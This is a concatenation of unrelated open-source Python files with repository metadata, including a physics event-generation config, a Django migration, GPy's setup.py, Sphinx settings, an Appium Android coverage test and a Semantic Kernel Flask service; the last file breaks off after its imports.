992ef5c5a51c47b4863fce8bcfdfbd2c973bb95d | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r9/Gen/DecFiles/options/14103050.py | 600b4f3f3becc10dbe313d0fbf4ba87e67483ba9 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r9/Gen/DecFiles/options/14103050.py generated: Fri, 27 Mar 2015 16:10:10
#
# Event Type: 14103050
#
# ASCII decay Descriptor: [B_c+ -> (B0 -> K+ K-) pi+]cc
#
from Configurables import Generation
Generation().EventType = 14103050
Generation().SampleGenerationTool = "Special"
from Configurables import Special
Generation().addTool( Special )
Generation().Special.ProductionTool = "BcVegPyProduction"
Generation().PileUpTool = "FixedLuminosityForRareProcess"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bc_Bdpi+,KK=BcVegPy,DecProdCut.dec"
Generation().Special.CutTool = "BcDaughtersInLHCb"
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
1626fb780031dc410b6a61f8a143c903187cca5f | 3922e9b41bf8bf5dd0a0d9abc8852d147a02db0f | /articles/build/lib.linux-i686-2.7/migrations/0007_article_details_time.py | 9db06b6092089d394cf6015df2b0f59025538157 | [] | no_license | levi-p/market | 3ddd0ca20818139c96fa102256f21249d85f104f | 5deb8dbf83ddeb07415bd21703b57f3c3d54aa54 | refs/heads/master | 2020-07-10T18:03:30.316598 | 2017-01-20T15:00:39 | 2017-01-20T15:00:39 | 67,126,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-08-22 16:14
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a ``time`` DateField to the ``article_details`` model.

    NOTE(review): the default is the fixed timestamp captured when
    ``makemigrations`` ran (2016-08-22), not ``datetime.now`` -- every
    pre-existing row receives this constant value.
    """

    dependencies = [
        ('articles', '0006_auto_20160808_1530'),
    ]

    operations = [
        migrations.AddField(
            model_name='article_details',
            name='time',
            field=models.DateField(default=datetime.datetime(2016, 8, 22, 16, 14, 20, 530291)),
        ),
    ]
| [
"levipda@gmail.com"
] | levipda@gmail.com |
3d80d6041c56250f6eb099cbf6605149393ecf7f | c7386a7a7aafabe9feb8368c42b607cff70dcfe7 | /GPy-devel/setup.py | 2f1dc25f90eaa53cea5e489880498d0ae4ee1b51 | [
"BSD-3-Clause"
] | permissive | dechamoungsri/Prosody_modeling | 8f3d603af6c54786cb048186bab65cfcd5b441f1 | 7895a032dde1c2c34cf42b7c362ca2b61ada0f37 | refs/heads/master | 2021-08-31T02:32:42.813986 | 2017-12-20T06:42:36 | 2017-12-20T06:42:36 | 114,848,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,878 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#===============================================================================
# Copyright (c) 2012 - 2014, GPy authors (see AUTHORS.txt).
# Copyright (c) 2014, James Hensman, Max Zwiessele
# Copyright (c) 2015, Max Zwiessele
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of GPy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
from __future__ import print_function
import os
import sys
from setuptools import setup, Extension
import numpy as np
import codecs
def read(fname):
    """Return the full contents of *fname* decoded as Latin-1 text."""
    handle = codecs.open(fname, 'r', 'latin')
    try:
        return handle.read()
    finally:
        handle.close()
def read_to_rst(fname):
    """Convert a Markdown file to reST via pypandoc, if available.

    Writes the converted text next to *fname* with a ``.rst`` suffix and
    returns it. When pypandoc is not installed, falls back to returning
    the raw (unconverted) file contents.
    """
    try:
        import pypandoc
        rstname = "{}.{}".format(os.path.splitext(fname)[0], 'rst')
        pypandoc.convert(read(fname), 'rst', format='md', outputfile=rstname)
        # Re-read the file pypandoc just wrote so we return reST text.
        with open(rstname, 'r') as f:
            rststr = f.read()
        return rststr
        #return read(rstname)
    except ImportError:
        # pypandoc missing: ship the Markdown as-is.
        return read(fname)
desc = """
Please refer to the github homepage for detailed instructions on installation and usage.
"""
version_dummy = {}
exec(read('GPy/__version__.py'), version_dummy)
__version__ = version_dummy['__version__']
del version_dummy
#Mac OS X Clang doesn't support OpenMP at the current time.
#This detects if we are building on a Mac
def ismac():
    """Return True when building on Mac OS X (sys.platform 'darwin')."""
    return sys.platform.startswith('darwin')
if ismac():
compile_flags = [ '-O3', ]
link_args = []
else:
compile_flags = [ '-fopenmp', '-O3']
link_args = ['-lgomp' ]
ext_mods = [Extension(name='GPy.kern.src.stationary_cython',
sources=['GPy/kern/src/stationary_cython.c',
'GPy/kern/src/stationary_utils.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags,
extra_link_args = link_args),
Extension(name='GPy.util.choleskies_cython',
sources=['GPy/util/choleskies_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_link_args = link_args,
extra_compile_args=compile_flags),
Extension(name='GPy.util.linalg_cython',
sources=['GPy/util/linalg_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags),
Extension(name='GPy.kern.src.coregionalize_cython',
sources=['GPy/kern/src/coregionalize_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags),
Extension(name='GPy.models.state_space_cython',
sources=['GPy/models/state_space_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags)]
setup(name = 'GPy',
version = __version__,
author = read_to_rst('AUTHORS.txt'),
author_email = "gpy.authors@gmail.com",
description = ("The Gaussian Process Toolbox"),
long_description = desc,
license = "BSD 3-clause",
keywords = "machine-learning gaussian-processes kernels",
url = "http://sheffieldml.github.com/GPy/",
download_url='https://github.com/SheffieldML/GPy/',
ext_modules = ext_mods,
packages = ["GPy",
"GPy.core",
"GPy.core.parameterization",
"GPy.kern",
"GPy.kern.src",
"GPy.kern.src.psi_comp",
"GPy.models",
"GPy.inference",
"GPy.inference.optimization",
"GPy.inference.mcmc",
"GPy.inference.latent_function_inference",
"GPy.likelihoods",
"GPy.mappings",
"GPy.examples",
"GPy.testing",
"GPy.util",
"GPy.plotting",
"GPy.plotting.gpy_plot",
"GPy.plotting.matplot_dep",
"GPy.plotting.matplot_dep.controllers",
"GPy.plotting.plotly_dep",
],
package_dir={'GPy': 'GPy'},
#package_data = {'GPy': ['defaults.cfg', 'installation.cfg',
# 'util/data_resources.json',
# 'util/football_teams.json',
# 'testing/plotting_tests/baseline/*.png'
# ]},
#data_files=[('GPy/testing/plotting_tests/baseline', 'testing/plotting_tests/baseline/*.png'),
# ('GPy/testing/', 'GPy/testing/pickle_test.pickle'),
# ],
include_package_data = True,
py_modules = ['GPy.__init__'],
test_suite = 'GPy.testing',
install_requires = ['numpy>=1.7', 'scipy>=0.16', 'six', 'paramz>=0.6.9'],
extras_require = {'docs':['sphinx'],
'optional':['mpi4py',
'ipython>=4.0.0',
],
'plotting':['matplotlib >= 1.3',
'plotly >= 1.8.6'],
'notebook':['jupyter_client >= 4.0.6',
'ipywidgets >= 4.0.3',
'ipykernel >= 4.1.0',
'notebook >= 4.0.5',
],
},
classifiers=['License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
]
)
# Check config files and settings:
# After installation, make sure a per-user GPy config exists, migrating the
# legacy ~/.gpy_user.cfg location if found, otherwise seeding it from the
# packaged installation.cfg stub.
local_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'GPy', 'installation.cfg'))
# NOTE(review): on a system with neither HOME nor USERPROFILE set, `home`
# is None and os.path.join below raises -- caught by the handler, but the
# message then interpolates an unbuilt path. Confirm acceptable.
home = os.getenv('HOME') or os.getenv('USERPROFILE')
user_file = os.path.join(home,'.config', 'GPy', 'user.cfg')
print("")
try:
    if not os.path.exists(user_file):
        # Does an old config exist?
        old_user_file = os.path.join(home,'.gpy_user.cfg')
        if os.path.exists(old_user_file):
            # Move it to new location:
            print("GPy: Found old config file, moving to new location {}".format(user_file))
            if not os.path.exists(os.path.dirname(user_file)):
                os.makedirs(os.path.dirname(user_file))
            os.rename(old_user_file, user_file)
        else:
            # No config file exists, save informative stub to user config folder:
            print("GPy: Saving user configuration file to {}".format(user_file))
            if not os.path.exists(os.path.dirname(user_file)):
                os.makedirs(os.path.dirname(user_file))
            with open(user_file, 'w') as f:
                with open(local_file, 'r') as l:
                    tmp = l.read()
                    f.write(tmp)
    else:
        print("GPy: User configuration file at location {}".format(user_file))
except Exception:
    # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are not
    # swallowed; config-file setup stays best-effort for ordinary errors.
    print("GPy: Could not write user configuration file {}".format(user_file))
| [
"mamegomaday@gmail.com"
] | mamegomaday@gmail.com |
386e9f87de2b8a14c1f22d2e81b9b26ff7240681 | e76fda1fba459456c4bc105e7a6dcc6277a1a26c | /a_bite_of_python/20-keyword_only.py | e71eba82c6f9c7dd4676247a610cbae522e006aa | [] | no_license | lafabo/i-love-tutorials | 6bb2a684a201975ab523d9721b02761a6269853c | eafcd47fd62e770107c7e1f08e0d6d60a539f1ec | refs/heads/master | 2021-01-21T04:46:56.365199 | 2016-07-20T17:38:03 | 2016-07-20T17:38:03 | 47,709,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | def total(initial=5, *numbers, extra_number):
count = initial
for number in numbers:
count += number
count += extra_number
print(count)
total(10, 1, 2, 3, extra_number=50)
total(10, 1, 2 ,3)
| [
"lazyfatboy@ya.ru"
] | lazyfatboy@ya.ru |
528f2d2fd54dc7fe09e75f50c0c94d71c27c51db | 505f1c36d931d4388a0a4f8c57fbd8bd9ab4d821 | /ImageAnalysis/ImageAnalysis/python/docs/conf.py | 4bd685e97dd796c81348cf542b1c3ba2c06100fd | [
"MIT"
] | permissive | mikebourbeauart/perler-printer | 9e43a51b82cb9b08d35c81e680ea7ef2624fda2e | 8c5023de6bb9b3cbe2bc28c1c823030dfd708db4 | refs/heads/master | 2022-12-01T18:46:37.632443 | 2020-05-04T00:41:11 | 2020-05-04T00:41:11 | 98,070,537 | 0 | 1 | MIT | 2022-11-22T05:58:34 | 2017-07-23T02:49:35 | Python | UTF-8 | Python | false | false | 5,452 | py | # -*- coding: utf-8 -*-
#
# Perler Printer documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 09 14:05:44 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
#sys.path.insert(0, os.path.abspath('../source'))
#sys.path.insert(0, os.path.abspath('../source/arduino-comms'))
#sys.path.insert(0, os.path.abspath('../source/image-parsing'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Perler Printer'
copyright = u'2017, Mike Bourbeau'
author = u'Mike Bourbeau'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
# NOTE(review): this sidebar list (about.html, donate.html) is
# alabaster-specific, while html_theme above is 'sphinx_rtd_theme', which
# supplies its own sidebar -- confirm whether this setting is still wanted.
html_sidebars = {
    '**': [
        'about.html',
        'navigation.html',
        'relations.html',  # needs 'show_related': True theme option to display
        'searchbox.html',
        'donate.html',
    ]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PerlerPrinterdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PerlerPrinter.tex', u'Perler Printer Documentation',
u'Mike Bourbeau', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'perlerprinter', u'Perler Printer Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PerlerPrinter', u'Perler Printer Documentation',
author, 'PerlerPrinter', 'One line description of project.',
'Miscellaneous'),
]
| [
"borbs727@gmail.com"
] | borbs727@gmail.com |
c0ca7088e2f0c17f756d8e622ffba7be75a25e7d | a2e673ba5797c242af20821075d76e84113d9503 | /Capitulo 2/Capitulo2-Decisoes.py | f55b8678aac544b2a5f1b22568957305bbdef20a | [] | no_license | Elvis-Lopes/Python-Fiap | ac0a09f44c67b9106a607b7e8082ce0248000316 | 1c10015155f84c8ddee5c8dbd7b21712741e1d1c | refs/heads/master | 2023-06-02T04:37:54.723196 | 2021-06-23T20:37:56 | 2021-06-23T20:37:56 | 377,885,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | nome = input("Digite o nome: ")
idade = int(input("Digite a idade: "))
prioridade = "Não"
if idade >= 65:
prioridade = "Sim"
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}')
else:
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}') | [
"elvislopes1996@hotmail.com"
] | elvislopes1996@hotmail.com |
8823445b94c9ad0e843e1f5cf51ff814a3180a57 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/amme/testcase/firstcases/testcase6_025.py | 874c6af813752507bf19190adc33729e91e453ef | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,763 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'com.money.manager.ex',
'appActivity' : 'com.money.manager.ex.home.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'com.money.manager.ex/com.money.manager.ex.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
    """Run *cmd* in a shell, wait *timeout* seconds, then terminate it.

    Used to fire adb commands that have no useful exit status; output is
    piped and discarded. NOTE(review): shell=True with an interpolated
    command string is unsafe for untrusted input -- callers here only pass
    fixed adb command strings.
    """
    p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
    time.sleep(timeout)
    p.terminate()
    return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
    """Find an element by primary selector *str1* (2 tries), falling back
    to secondary selector *str2* (5 tries), sleeping 1s between tries."""
    for i in range(0, 2, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str1)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str2)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    # Tap the screen to dismiss possible overlays, then make a final
    # unguarded attempt -- NoSuchElementException propagates to the caller.
    os.popen("adb shell input tap 50 50")
    element = driver.find_element_by_android_uiautomator(str2)
    return element
def swipe(driver, startxper, startyper, endxper, endyper) :
    """Swipe between two points given as fractions (0..1) of the screen
    size, retrying once after a WebDriverException."""
    size = driver.get_window_size()
    width = size["width"]
    height = size["height"]
    try:
        driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
                     end_y=int(height * endyper), duration=2000)
    except WebDriverException:
        # One retry after a short pause; a second failure propagates.
        time.sleep(1)
        driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
                     end_y=int(height * endyper), duration=2000)
    return
# testcase025
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememtBack(driver, "new UiSelector().text(\"$ 0.00\")", "new UiSelector().className(\"android.widget.TextView\").instance(7)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menu_period\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/radio\").className(\"android.widget.RadioButton\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionFilters\").className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Donate\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
driver.press_keycode(4)
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"6_025\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'com.money.manager.ex'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
2670acdaad0515f6c6a13dbfbff6a59c8b062e01 | 500bca3e22bd0c30c79b74918e9847742b3c428e | /sdk/python/endpoints/online/llm/src/sk/app.py | 6c4efd2ff36aeba32c63d59cd924d39133854683 | [
"MIT"
] | permissive | Azure/azureml-examples | 2304c862fd2e36e6640ecc4d09f69c5ed93b48ab | e5f7b247d4753f115a8f7da30cbe25294f71f9d7 | refs/heads/main | 2023-08-31T00:10:14.107509 | 2023-08-30T17:29:22 | 2023-08-30T17:29:22 | 289,334,021 | 1,219 | 1,074 | MIT | 2023-09-14T16:00:55 | 2020-08-21T18:04:26 | Jupyter Notebook | UTF-8 | Python | false | false | 4,917 | py | from __future__ import annotations
import sys, os, json
from flask import Flask, request
import semantic_kernel as sk
import semantic_kernel.connectors.ai.open_ai as sk_oai
from semantic_kernel.planning.basic_planner import BasicPlanner
from semantic_kernel.planning.plan import Plan
from azure.identity import DefaultAzureCredential, AzureCliCredential
# add parent directory to path
sys.path.insert(0, str(os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))))
import utils
openai_config: utils.OpenAIConfig = None
IS_CHAT_COMPLETION = None
import importlib
importlib.reload(utils)
# set to true for chat completion API, false for text completion
IS_CHAT_COMPLETION = True
credential = DefaultAzureCredential(additionally_allowed_tenants=["*"])
def init() -> tuple[sk.Kernel, BasicPlanner]:
utils.load_secrets(credential)
load_env_vars()
kernel = create_kernel(debug=False)
planner = BasicPlanner()
return kernel, planner
def load_env_vars():
    """Refresh the module-level configuration from the environment.

    Rebinds ``openai_config`` from ``utils.OpenAIConfig.from_env()`` and
    sets ``IS_CHAT_COMPLETION`` from the IS_CHAT_COMPLETION env var.
    """
    global openai_config
    openai_config = utils.OpenAIConfig.from_env()
    global IS_CHAT_COMPLETION
    # Bug fix: bool(os.environ.get(...)) treated ANY non-empty string --
    # including "false" and "0" -- as True. Parse the common truthy
    # spellings instead; unset/empty/falsy values disable chat completion,
    # matching the old behaviour for unset variables.
    IS_CHAT_COMPLETION = os.environ.get(
        "IS_CHAT_COMPLETION", ""
    ).strip().lower() in ("1", "true", "yes", "on")
def import_skills(kernel: sk.Kernel, skills_folder: str):
print(f"Importing skills from {skills_folder}")
for skill_name in os.listdir(skills_folder):
skill_full_path = os.path.join(skills_folder, skill_name)
print(f"== Importing skill {skill_name}: {skill_full_path}")
kernel.import_semantic_skill_from_directory(skills_folder, skill_name)
def create_kernel(debug: bool = False) -> sk.Kernel:
logger = sk.NullLogger()
if debug:
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
handler.setFormatter(formatter)
logger.handlers.clear()
logger.addHandler(handler)
kernel = sk.Kernel()
if openai_config.OPENAI_API_TYPE == "azure":
# if using chat service from Azure OpenAI API, use AzureChatCompletion
kernel.add_text_completion_service(
"completion",
sk_oai.AzureChatCompletion(
deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
api_key=openai_config.OPENAI_API_KEY,
endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
)
if IS_CHAT_COMPLETION
else sk_oai.AzureTextCompletion(
deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
api_key=openai_config.OPENAI_API_KEY,
endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
),
)
else:
print(
"using openai", openai_config.OPENAI_MODEL_ID, openai_config.OPENAI_ORG_ID
)
kernel.add_text_completion_service(
"completion",
sk_oai.OpenAIChatCompletion(
openai_config.OPENAI_MODEL_ID,
openai_config.OPENAI_API_KEY,
openai_config.OPENAI_ORG_ID,
)
if IS_CHAT_COMPLETION
else sk_oai.OpenAITextCompletion(
openai_config.OPENAI_MODEL_ID,
openai_config.OPENAI_API_KEY,
openai_config.OPENAI_ORG_ID,
),
)
# import skills from skills folder
import_skills(
kernel, os.path.join(os.path.dirname(os.path.realpath(__file__)), "skills")
)
return kernel
kernel, planner = init()
async def invoke_skill(skillName, functionName, context):
skillFunction = kernel.func(skillName, functionName)
return await skillFunction.invoke_async(context=context)
# class for plan deserializing
class GeneratedPlan:
    """Minimal shim standing in for the planner's generated-plan object.

    ``Plan`` only reads ``.result`` (a JSON string), so wrapping the
    client-posted JSON in this object is enough to rehydrate a plan.
    """

    def __init__(self, result: str):
        self.result = result
app = Flask(__name__)
@app.route("/", methods=["GET"])
def home():
return "ok"
@app.route("/health", methods=["GET"])
def health():
return "healthy"
@app.route("/skills/<skillName>/invoke/<functionName>", methods=["POST"])
async def invoke(skillName, functionName):
return await invoke_skill(skillName, functionName, request.get_json())
@app.route("/planner/createplan", methods=["POST"])
async def createplan():
body = request.get_json()
goal = body["value"]
plan = await planner.create_plan_async(goal, kernel)
print(plan.generated_plan.result)
return plan.generated_plan.result
@app.route("/planner/executeplan", methods=["POST"])
async def executeplan():
body = request.get_json()
print(body)
gp = GeneratedPlan(result=json.dumps(body))
p = Plan(goal=None, prompt=None, plan=gp)
result = await planner.execute_plan_async(p, kernel)
print(result)
return result
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5001)
| [
"noreply@github.com"
] | Azure.noreply@github.com |
415bc40d799acf97c2acf3a2e6cdcadc3d2ab377 | fdb5c8d71839ad15c7942d1367972524d2243573 | /sciwing/infer/seq_label_inference/seq_label_inference.py | 54a7ad00f66c41a732e0b26e794539a37bbfedf5 | [
"MIT"
] | permissive | abhinavkashyap/sciwing | b752b779053a2444f64bcdbc64e2bdc6a0d55ed6 | 1c061b99a35a9d8b565d9762aaaf5db979b50112 | refs/heads/master | 2023-05-12T16:00:08.210458 | 2022-03-25T01:19:00 | 2022-03-25T01:19:00 | 187,997,438 | 58 | 11 | MIT | 2023-05-01T21:26:41 | 2019-05-22T08:36:14 | Python | UTF-8 | Python | false | false | 15,664 | py | import torch.nn as nn
from typing import Optional, Union, Dict, Any, List
import torch
from sciwing.data.datasets_manager import DatasetsManager
from sciwing.data.line import Line
from sciwing.data.seq_label import SeqLabel
from sciwing.infer.seq_label_inference.BaseSeqLabelInference import (
BaseSeqLabelInference,
)
from sciwing.utils.science_ie_data_utils import ScienceIEDataUtils
import wasabi
from sciwing.metrics.token_cls_accuracy import TokenClassificationAccuracy
